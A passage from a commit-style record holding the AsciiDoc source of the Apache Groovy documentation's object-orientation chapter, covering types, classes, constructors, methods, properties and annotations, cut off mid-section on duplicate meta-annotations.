gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n<3> create a class node representing the `@CompileStatic` annotation type\n<4> create a class node representing the `TypeCheckingMode` enum type\n<5> `collector` is the `@AnnotationCollector` node found in the meta-annotation. 
Usually unused.\n<6> `aliasAnnotationUsage` is the meta-annotation being expanded, here it is `@CompileDynamic`\n<7> `aliasAnnotated` is the node being annotated with the meta-annotation\n<8> `sourceUnit` is the `SourceUnit` being compiled\n<9> we create a new annotation node for `@CompileStatic`\n<10> we create an expression equivalent to `TypeCheckingMode.SKIP`\n<11> we add that expression to the annotation node, which is now `@CompileStatic(TypeCheckingMode.SKIP)`\n<12> return the generated annotation\n\nIn the example, the `visit` method is the only method which has to be overridden. It is meant to return a list of\nannotation nodes that will be added to the node annotated with the meta-annotation. In this example, we return a\nsingle one corresponding to `@CompileStatic(TypeCheckingMode.SKIP)`.\n\n=== Inheritance\n\n(TBD)\n\n\n[[generics]]\n=== Generics\n\n(TBD)\n\n\ninclude::{projectdir}\/src\/spec\/doc\/core-traits.adoc[leveloffset=+1]\n\n","old_contents":"\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n= Object orientation\n:jls: http:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/\n\nThis chapter covers the object orientation of the Groovy programming language.\n\n== Types\n\n=== Primitive types\n\nGroovy supports the same primitive types as those defined by the {jls}[Java Language Specification]:\n\n* integral types: `byte` (8 bit), `short` (16 bit), `int` (32 bit) and `long` (64 bit)\n* floating-point types: `float` (32 bit) and `double` (64 bit)\n* `boolean` type (exactly `true` or `false`)\n* `char` type (16 bit, usable as a numeric type, representing an UTF-16 code)\n\nWhile Groovy declares and stores primitive fields and variables as primitives, because it uses Objects for\neverything, it autowraps references to primitives. Just like Java, the wrappers it uses are\n\n[cols=\"1,1\" options=\"header\"]\n.primitive wrappers\n|====\n| Primitive type\n| Wrapper class\n\n| boolean\n| Boolean\n\n| char\n| Character\n\n| short\n| Short\n\n| int\n| Integer\n\n| long\n| Long\n\n| float\n| Float\n\n| double\n| Double\n|====\n\nHere's an example using `int`\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/PrimitiveTest.groovy[tags=primitive_references,indent=0]\n----\n\nNow you may be concerned that this means every time you use a mathematical operator on a reference to a primitive\nthat you'll incur the cost of unboxing and reboxing the primitive. 
But this is not the case, as Groovy will compile\nyour operators into their link:core-operators.html#_operator-overloading[method equivalents] and uses those instead.\nAdditionally, Groovy will automatically unbox to a primitive when calling a Java method that takes a primitive\nparameter and automatically box primitive method return values from Java. However, be aware there are some\nlink:core-differences-java.html#_primitives_and_wrappers[differences] from Java's method resolution.\n\n=== Class\n\nGroovy classes are very similar to Java classes, being compatible to those ones at JVM level. They may have methods and fields\/properties, which can have the same modifiers (public, protected, private, static, etc) as Java classes.\n\nHere are key aspects of Groovy classes, that are different from their Java counterparts:\n\n* Public fields are turned into properties automatically, which results in less verbose code,\nwithout so many getter and setter methods. More on this aspect will be covered in the <<fields,fields and properties section>>.\n* Their declarations and any property or method without an access modifier are public.\n* Classes do not need to have the same name of the files where they are defined.\n* One file may contain one or more classes (but if a file contains no classes, it is considered a script).\n\nThe following code presents an example class.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_definition,indent=0]\n----\n<1> class beginning, with the name `Person`\n<2> string field and property named `name`\n<3> method definition\n\n\n==== Normal class\n\nNormal classes refer to classes which are top level and concrete. This means they can be instantiated without restrictions from any other classes or scripts. This way, they can only be public (even though the `public` keyword may be suppressed). Classes are instantiated by calling their constructors, using the `new` keyword, as in the following snippet.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_instantiation,indent=0]\n----\n\n\n==== Inner class\n\nInner classes are defined within another classes. The enclosing class can use the inner class as usual. On the other side, a inner class can access members of its enclosing class, even if they are private. Classes other than the enclosing class are not allowed to access inner classes. Here is an example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class,indent=0]\n----\n<1> the inner class is instantiated and its method gets called\n<2> inner class definition, inside its enclosing class\n<3> even being private, a field of the enclosing class is accessed by the inner class\n\nThere are some reasons for using inner classes:\n\n * They increase encapsulation by hiding the inner class from other classes, which do not need to know about it. This also leads to cleaner packages and workspaces.\n * They provide a good organization, by grouping classes that are used by only one class.\n * They lead to more maintainable codes, since inner classes are near the classes that use them.\n\nIn several cases, inner classes are implementation of interfaces whose methods are needed by the outer class. 
The code below illustrates this with the usage of threads, which are very common.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class2,indent=0]\n----\n\nNote that the class `Inner2` is defined only to provide an implementation of the method `run` to class `Outer2`. Anonymous inner classes help to eliminate verbosity in this case.\n\n\n===== Anonymous inner class\n\nThe last example of inner class can be simplified with an anonymous inner class. The same functionality can be achieved with the following code.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=anonymous_inner_class,indent=0]\n----\n<1> comparing with the last example of previous section, the `new Inner2()` was replaced by `new Runnable()` along with all its implementation\n<2> the method `start` is invoked normally\n\nThus, there was no need to define a new class to be used just once.\n\n\n==== Abstract class\n\nAbstract classes represent generic concepts, thus, they cannot be instantiated, being created to be subclassed. Their members include fields\/properties and abstract or concrete methods. Abstract methods do not have implementation, and must be implemented by concrete subclasses.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=abstract_class,indent=0]\n----\n<1> abstract classes must be declared with `abstract` keyword\n<2> abstract methods must also be declared with `abstract` keyword\n\nAbstract classes are commonly compared to interfaces. But there are at least two important differences of choosing one or another. First, while abstract classes may contain fields\/properties and concrete methods, interfaces may contain only abstract methods (method signatures). Moreover, one class can implement several interfaces, whereas it can extend just one class, abstract or not. \n\n=== Interface\n\nAn interface defines a contract that a class needs to conform to. An interface only defines a list of methods that need\nto be implemented, but does not define the methods implementation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_def_1,indent=0]\n----\n<1> an interface needs to be declared using the `interface` keyword\n<2> an interface only defines method signatures\n\nMethods of an interface are always *public*. It is an error to use `protected` or `private` methods in interfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=protected_forbidden,indent=0]\n----\n<1> Using `protected` is a compile-time error\n\nA class _implements_ an interface if it defines the interface in its `implements` list or if any of its superclasses\ndoes:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_implements,indent=0]\n----\n<1> The `SystemGreeter` declares the `Greeter` interface using the `implements` keyword\n<2> Then implements the required `greet` method\n<3> Any instance of `SystemGreeter` is also an instance of the `Greeter` interface\n\nAn interface can extend another interface:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=extended_interface,indent=0]\n----\n<1> the `ExtendedGreeter` interface extends the `Greeter` interface using the `extends` keyword\n\nIt is worth noting that for a class to be an instance of an interface, it has to be explicit. 
For example, the following\nclass defines the `greet` method as it is declared in the `Greeter` interface, but does not declare `Greeter` in its\ninterfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=no_structural_interface,indent=0]\n----\n\nIn other words, Groovy does not define structural typing. It is however possible to make an instance of an object\nimplement an interface at runtime, using the `as` coercion operator:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_coercion,indent=0]\n----\n<1> create an instance of `DefaultGreeter` that does not implement the interface\n<2> coerce the instance into a `Greeter` at runtime\n<3> the coerced instance implements the `Greeter` interface\n\nYou can see that there are two distinct objects: one is the source object, a `DefaultGreeter` instance, which does not\nimplement the interface. The other is an instance of `Greeter` that delegates to the coerced object.\n\nTIP: Groovy interfaces do not support default implementation like Java 8 interfaces. If you are looking for something\nsimilar (but not equal), <<_traits,traits>> are close to interfaces, but allow default implementation as well as other\nimportant features described in this manual.\n\n=== Constructors\n\nConstructors are special methods used to initialize an object with a specific state. As with normal methods,\nit is possible for a class to declare more than one constructor, so long as each constructor has a unique\ntype signature. If an object doesn't require any parameters during construction, it may use a _no-arg_ constructor.\nIf no constructors are supplied, an empty no-arg constructor will be provided by the Groovy compiler. For constructors\nwith parameters, Groovy supports two invocation styles: using positional parameters or named parameters.\nThe former style is similar to how you would use Java constructors, while the second way\nallows one to specify parameter names when invoking the constructor.\n\n==== Positional argument constructor\n\nTo create an object by using positional argument constructors, the respective class needs to declare one or more\nconstructors. In the case of multiple constructors, each must have a unique type signature. The constructors can also\nadded to the class using the gapi:groovy.transform.TupleConstructor[] annotation.\n\nTypically, once at least one constructor is declared, the class can only be instantiated by having one of its\nconstructors called. It is worth noting that, in this case, you can't normally create the class with named parameters.\nGroovy does support named parameters so long as the class contains a no-arg constructor or a constructor which takes\na single `Map` argument - see the next section for details.\n\nThere are three forms of using a declared constructor. The first one is the normal Java way, with the `new` keyword.\nThe others rely on coercion of lists into the desired types. 
In this case, it is possible to coerce with the `as`\nkeyword and by statically typing the variable.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_positional_parameters,indent=0]\n----\n<1> Constructor declaration\n<2> Constructor invocation, classic Java way\n<3> Constructor usage, using coercion with `as` keyword\n<4> Constructor usage, using coercion in assignment\n\n\n==== Named argument constructor\n\nIf no (or a no-arg) constructor is declared, it is possible to create objects by passing parameters in the form of a\nmap (property\/value pairs). This can be in handy in cases where one wants to allow several combinations of parameters.\nOtherwise, by using traditional positional parameters it would be necessary to declare all possible constructors.\nHaving a constructor taking a single `Map` argument is also supported - such a constructor may also be added using\nthe gapi:groovy.transform.MapConstructor[] annotation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_named_parameters,indent=0]\n----\n<1> No constructor declared\n<2> No parameters given in the instantiation\n<3> `name` parameter given in the instantiation\n<4> `age` parameter given in the instantiation\n<5> `name` and `age` parameters given in the instantiation\n\nIt is important to highlight, however, that this approach gives more power to the constructor caller,\nwhile imposing an increased responsibility on the caller to get the names and value types correct.\nThus, if greater control is desired, declaring constructors using positional parameters might be preferred.\n\nNotes:\n\n* While the example above supplied no constructor, you can also supply a no-arg constructor\nor a constructor with a single `Map` argument as previously mentioned.\n* You can support both named and positional construction\nby supply both positional constructors as well as a no-arg or Map constructor.\n* When no (or a no-arg) constructor is declared, Groovy replaces the named constructor call by a call\nto the no-arg constructor followed by calls to the setter for each supplied named property. So, you\nmight be better off using the Map constructor if your properties are declared as `final` (since they\nmust be set in the constructor rather than after the fact with setters).\n\n\n=== Methods\n\nGroovy methods are quite similar to other languages. Some peculiarities will be shown in the next subsections. \n\n==== Method definition\n\nA method is defined with a return type or with the `def` keyword, to make the return type untyped. A method can also receive any number of arguments, which may not have their types explicitly declared. Java modifiers can be used normally, and if no visibility modifier is provided, the method is public.\n\nMethods in Groovy always return some value. If no `return` statement is provided, the value evaluated in the last line executed will be returned. For instance, note that none of the following methods uses the `return` keyword.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=method_definition ,indent=0]\n----\n<1> Method with no return type declared and no parameter\n<2> Method with explicit return type and no parameter\n<3> Method with a parameter with no type defined\n<4> Static method with a String parameter\n\n==== Named arguments\n\nLike constructors, normal methods can also be called with named arguments. 
They need to receive the parameters as a map. In the method body, the values can be accessed as in normal maps (`map.key`).\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=named_arguments ,indent=0]\n----\n\n==== Default arguments\n\nDefault arguments make parameters optional. If the argument is not supplied, the method assumes a default value.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=default_arguments ,indent=0]\n----\n\nNote that no mandatory parameter can be defined after a default parameter is present, only other default parameters.\n\n==== Varargs\n\nGroovy supports methods with a variable number of arguments. They are defined like this: `def foo(p1, ..., pn, T... args)`.\nHere `foo` supports `n` arguments by default, but also an unspecified number of further arguments exceeding `n`.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_example,indent=0]\n----\n\nThis example defines a method `foo`, that can take any number of arguments, including no arguments at all.\n`args.length` will return the number of arguments given. Groovy allows `T[]` as a alternative notation to `T...`.\nThat means any method with an array as last parameter is seen by Groovy as a method that can take a variable number of arguments.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_notation,indent=0]\n----\n\nIf a method with varargs is called with `null` as the vararg parameter, then the argument will be `null` and not an array of length one with `null` as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_null_parameter,indent=0]\n----\n\nIf a varargs method is called with an array as an argument, then the argument will be that array instead of an array of length one containing the given array as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_parameter,indent=0]\n----\n\nAnother important point are varargs in combination with method overloading. 
In case of method overloading Groovy will select the most specific method.\nFor example if a method `foo` takes a varargs argument of type `T` and another method `foo` also takes one argument of type `T`, the second method is preferred.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_method_overloading,indent=0]\n----\n\n==== Method selection algorithm\n\n(TBD)\n\n==== Exception declaration\n\nGroovy automatically allows you to treat checked exceptions like unchecked exceptions.\nThis means that you don't need to declare any checked exceptions that a method may throw\nas shown in the following example which can throw a `FileNotFoundException` if the file isn't found:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=idiomatic_method_declaration,indent=0]\n----\n\nNor will you be required to surround the call to the `badRead` method in the previous example within a try\/catch\nblock - though you are free to do so if you wish.\n\nIf you wish to declare any exceptions that your code might throw (checked or otherwise) you are free to do so.\nAdding exceptions won't change how the code is used from any other Groovy code but can be seen as documentation\nfor the human reader of your code. The exceptions will become part of the method declaration in the bytecode,\nso if your code might be called from Java, it might be useful to include them.\nUsing an explicit checked exception declaration is illustrated in the following example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=checked_method_declaration,indent=0]\n----\n\n=== Fields and properties\n\n[[fields]]\n==== Fields\n\nA field is a member of a class or a trait which:\n\n* a mandatory _access modifier_ (`public`, `protected`, or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_declaration,indent=0]\n----\n<1> a `private` field named `id`, of type `int`\n<2> a `protected` field named `description`, of type `String`\n<3> a `public static final` field named _DEBUG_ of type `boolean`\n\nA field may be initialized directly at declaration:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_initialization,indent=0]\n----\n<1> the private field `id` is initialized with `IDGenerator.next()`\n\nIt is possible to omit the type declaration of a field. This is however considered a bad practice and in general it\nis a good idea to use strong typing for fields:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=typing_fields,indent=0]\n----\n<1> the field `mapping` doesn't declare a type\n<2> the field `mapping` has a strong type\n\nThe difference between the two is important if you want to use optional type checking later. It is also important\nfor documentation. However in some cases like scripting or if you want to rely on duck typing it may be interesting\nto omit the type.\n\n[[properties]]\n==== Properties\n\nA property is a combination of a private field and getters\/setters. 
You can define a property with:\n\n* an *absent* access modifier (no `public`, `protected` or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\nGroovy will then generate the getters\/setters appropriately. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_definition,indent=0]\n----\n<1> creates a backing `private String name` field, a `getName` and a `setName` method\n<2> creates a backing `private int age` field, a `getAge` and a `setAge` method\n\nIf a property is declared `final`, no setter is generated:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=readonly_property,indent=0]\n----\n<1> defines a read-only property of type `String`\n<2> defines a read-only property of type `int`\n<3> assigns the `name` parameter to the `name` field\n<4> assigns the `age` parameter to the `age` field\n\nProperties are accessed by name and will call the getter or setter transparently, unless the code is in the class\nwhich defines the property:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=property_access,indent=0]\n----\n<1> `this.name` will directly access the field because the property is accessed from within the class that defines it\n<2> similarily a read access is done directly on the `name` field\n<3> write access to the property is done outside of the `Person` class so it will implicitly call `setName`\n<4> read access to the property is done outside of the `Person` class so it will implicitly call `getName`\n<5> this will call the `name` method on `Person` which performs a direct access to the field\n<6> this will call the `wonder` method on `Person` which performs a direct read access to the field\n\nIt is worth noting that this behavior of accessing the backing field directly is done in order to prevent a stack\noverflow when using the property access syntax within a class that defines the property.\n\nIt is possible to list the properties of a class thanks to the meta `properties` field of an instance:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_meta,indent=0]\n----\n\nBy convention, Groovy will recognize properties even if there is no backing field\nprovided there are getters or setters\nthat follow the Java Beans specification. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=pseudo_properties,indent=0]\n----\n<1> writing `p.name` is allowed because there is a pseudo-property `name`\n<2> reading `p.age` is allowed because there is a pseudo-readonly property `age`\n<3> writing `p.groovy` is allowed because there is a pseudo-writeonly property `groovy`\n\nThis syntactic sugar is at the core of many DSLs written in Groovy.\n\n=== Annotation\n\n[[ann-definition]]\n==== Annotation definition\n\nAn annotation is a kind of special interface dedicated at annotating elements of the code. An annotation is a type which\nsuperinterface is the jdk:java.lang.annotation.Annotation[Annotation] interface. Annotations are declared in a very\nsimilar way to interfaces, using the `@interface` keyword:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=define_annotation,indent=0]\n----\n\nAn annotation may define members in the form of methods without bodies and an optional default value. 
The possible\nmember types are limited to:\n\n* primitive types\n* jdk:java.lang.String[Strings]\n* jdk:java.lang.Class[Classes]\n* an jdk:java.lang.Enum[enumeration]\n* another jdk:java.lang.annotation.Annotation[annotation type]\n* or any array of the above\n\nFor example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string_default,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_int,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_class,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_annotation,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_enum,indent=0]\n----\n<1> an annotation defining a `value` member of type `String`\n<2> an annotation defining a `value` member of type `String` with a default value of `something`\n<3> an annotation defining a `step` member of type the primitive type `int`\n<4> an annotation defining a `appliesTo` member of type `Class`\n<5> an annotation defining a `value` member which type is an array of another annotation type\n<6> an annotation defining a `dayOfWeek` member which type is the enumeration type `DayOfWeek`\n\nUnlike in the Java language, in Groovy, an annotation can be used to alter the semantics of the language. It is especially\ntrue of AST transformations which will generate code based on annotations.\n\n[[ann-placement]]\n==== Annotation placement\n\nAn annotation can be applied on various elements of the code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=apply_annotation_1,indent=0]\n----\n<1> `@SomeAnnotation` applies to the `someMethod` method\n<2> `@SomeAnnotation` applies to the `SomeClass` class\n<3> `@SomeAnnotation` applies to the `var` variable\n\nIn order to limit the scope where an annotation can be applied, it is necessary to declare it on the annotation\ndefinition, using the jdk:java.lang.annotation.Target[Target] annotation. For example, here is how you would\ndeclare that an annotation can be applied to a class or a method:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_target,indent=0]\n----\n<1> the `@Target` annotation is meant to annotate an annotation with a scope.\n<2> `@SomeAnnotation` will therefore only be allowed on `TYPE` or `METHOD`\n\nThe list of possible targets is available in the jdk:java.lang.annotation.ElementType[ElementType enumeration].\n\nWARNING: Groovy does not support the jdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_PARAMETER] and\njdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_USE] element types which were introduced in Java 8.\n\n==== Annotation member values\n\nWhen an annotation is used, it is required to set at least all members that do not have a default value. 
For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set,indent=0]\n----\n\nHowever it is possible to omit `value=` in the declaration of the value of an annotation if the member `value` is the\nonly one being set:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set_option,indent=0]\n----\n<1> we can omit the `statusCode` because it has a default value, but `value` needs to be set\n<2> since `value` is the only mandatory member without a default, we can omit `value=`\n<3> if both `value` and `statusCode` need to be set, it is required to use `value=` for the default `value` member\n\n==== Retention policy\n\nThe visibility of an annotation depends on its retention policy. The retention policy of an annotation is set using\nthe jdk:java.lang.annotation.Retention[Retention] annotation:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_retention,indent=0]\n----\n<1> the `@Retention` annotation annotates the `@SomeAnnotation` annotation\n<2> so `@SomeAnnotation` will have a `SOURCE` retention\n\nThe list of possible retention targets and description is available in the\njdk:java.lang.annotation.RetentionPolicy[RetentionPolicy] enumeration. The\nchoice usually depends on whether you want an annotation to be visible at\ncompile time or runtime.\n\n==== Closure annotation parameters\n\nAn interesting feature of annotations in Groovy is that you can use a closure as an annotation value. Therefore\nannotations may be used with a wide variety of expressions and still have IDE support. For example, imagine a\nframework where you want to execute some methods based on environmental constraints like the JDK version or the OS.\nOne could write the following code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_example,indent=0]\n----\n\nFor the `@OnlyIf` annotation to accept a `Closure` as an argument, you only have to declare the `value` as a `Class`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_def,indent=0]\n----\n\nTo complete the example, let's write a sample runner that would use that information:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner,indent=0]\n----\n<1> create a new instance of the class passed as an argument (the task class)\n<2> emulate an environment which is JDK 6 and not Windows\n<3> iterate on all declared methods of the task class\n<4> if the method is public and takes no-argument\n<5> try to find the `@OnlyIf` annotation\n<6> if it is found get the `value` and create a new `Closure` out of it\n<7> set the `delegate` of the closure to our environment variable\n<8> call the closure, which is the annotation closure. It will return a `boolean`\n<9> if it is `true`, call the method\n<10> if the method is not annotated with `@OnlyIf`, execute the method anyway\n<11> after that, return the task object\n\nThen the runner can be used this way:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner_exec,indent=0]\n----\n\n==== Meta-annotations\n\n===== Declaring meta-annotations\n\nMeta-annotations, also known as annotation aliases are annotations that\nare replaced at compile time by other annotations (one meta-annotation\nis an alias for one or more annotations). 
Meta-annotations can be used to\nreduce the size of code involving multiple annotations.\n\nLet\u2019s start with a simple example. Imagine you have the\u00a0`@Service`\nand\u00a0`@Transactional` annotations and that you want to annotate a class\nwith both:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class,indent=0]\n----\n\nGiven the multiplication of annotations that you could add to the same class, a meta-annotation\ncould help by reducing the two annotations with a single one having the very same semantics. For example,\nwe might want to write this instead:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class2,indent=0]\n----\n<1> `@TransactionalService` is a meta-annotation\n\nA meta-annotation is declared as a regular annotation but annotated with `@AnnotationCollector` and the\nlist of annotations it is collecting. In our case, the `@TransactionalService` annotation can be written:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=metaann_ts,indent=0]\n----\n<1> annotate the meta-annotation with `@Service`\n<2> annotate the meta-annotation with `@Transactional`\n<3> annotate the meta-annotation with `@AnnotationCollector`\n\n[[meta-ann-behavior]]\n===== Behavior of meta-annotations\n\nGroovy supports both _precompiled_ and _source form_\nmeta-annotations. This means that your meta-annotation\u00a0_may_ be\nprecompiled, or you can have it in the same source tree as the one you\nare currently compiling.\n\nINFO: Meta-annotations are a Groovy-only feature. There is\nno chance for you to annotate a Java class with a meta-annotation and\nhope it will do the same as in Groovy. Likewise, you cannot write a\nmeta-annotation in Java: both the meta-annotation definition\u00a0*and* usage\nhave to be Groovy code. But you can happily collect Java annotations\nand Groovy annotations within your meta-annotation.\n\nWhen the Groovy compiler encounters a class annotated with a\nmeta-annotation, it\u00a0*replaces* it with the collected annotations. So,\nin our previous example, it will\nreplace\u00a0`@TransactionalService` with\u00a0`@Transactional` and\u00a0`@Service`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotations_expanded,indent=0]\n----\n\nThe conversion from a meta-annotation to the collected annotations is performed during the\n_semantic analysis_ compilation phase.\u00a0\n\nIn addition to replacing the alias with the collected annotations, a meta-annotation is capable of\nprocessing them, including arguments.\n\n[[meta-ann-members]]\n===== Meta-annotation parameters\n\nMeta-annotations can collect annotations which have parameters. To illustrate this,\nwe will imagine two annotations, each of them accepting one argument:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\n----\n\nAnd suppose that you want create a meta-annotation named\u00a0`@Explosive`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_explosive,indent=0]\n----\n\nBy default, when the annotations are replaced, they will get the\nannotation parameter values *as they were defined in the alias*. 
More interesting,\nthe meta-annotation supports overriding specific values:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=example_bomb,indent=0]\n----\n<1> the `after` value provided as a parameter to\u00a0`@Explosive` overrides the one defined in the `@Timeout` annotation\n\nIf two annotations define the same parameter name, the default processor\nwill copy the annotation value to all annotations that accept this parameter:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_same_values,indent=0]\n----\n<1> the `@Foo` annotation defines the `value` member of type `String`\n<2> the `@Bar` annotation also defines the `value` member of type `String`\n<3> the `@FooBar` meta-annotation aggregates `@Foo` and `@Bar`\n<4> class `Bob` is annotated with `@Foo` and `@Bar`\n<5> the value of the `@Foo` annotation on `Bob` is `a`\n<6> while the value of the `@Bar` annotation on `Bob` is `b`\n<7> class `Joe` is annotated with `@FooBar`\n<8> then the value of the `@Foo` annotation on `Joe` is `a`\n<9> and the value of the `@Bar` annotation on `Joe` is also `a`\n\nIn the second case, the meta-annotation value was copied in\nboth `@Foo` and `@Bar` annotations.\n\nWARNING: It is a compile time error if the collected annotations define the same members\nwith incompatible types. For example if on the previous example `@Foo` defined a value of\ntype `String` but `@Bar` defined a value of type `int`.\n\nIt is however possible to customize the behavior of meta-annotations and describe how collected\nannotations are expanded. We'll look at how to do that shortly but first there is an advanced\nprocessing option to cover.\n\n[[handling_duplicate_annotations]]\n===== Handling duplicate annotations\n\nThe `@AnnotationCollector` annotation supports a `mode` parameter which can be used to\nalter how the default processor handles annotation replacement in the presence of\nduplicate annotations.\n\nINFO: Custom processors (discussed next) may or may not support this parameter.\n\nAs an example, suppose you create a meta-annotation containing the `@ToString` annotation\nand then place your meta-annotation on a class that already has an explicit `@ToString`\nannotation. Should this be an error? Should both annotations be applied? Does one take\npriority over the other? There is no correct answer. In some scenarios it might be\nquite appropriate for any of these answers to be correct. So, rather than trying to\npreempt one correct way to handle the duplicate annotation issue, Groovy let's you\nwrite your own custom meta-annotation processors (covered next) and let's you write\nwhatever checking logic you like within AST transforms 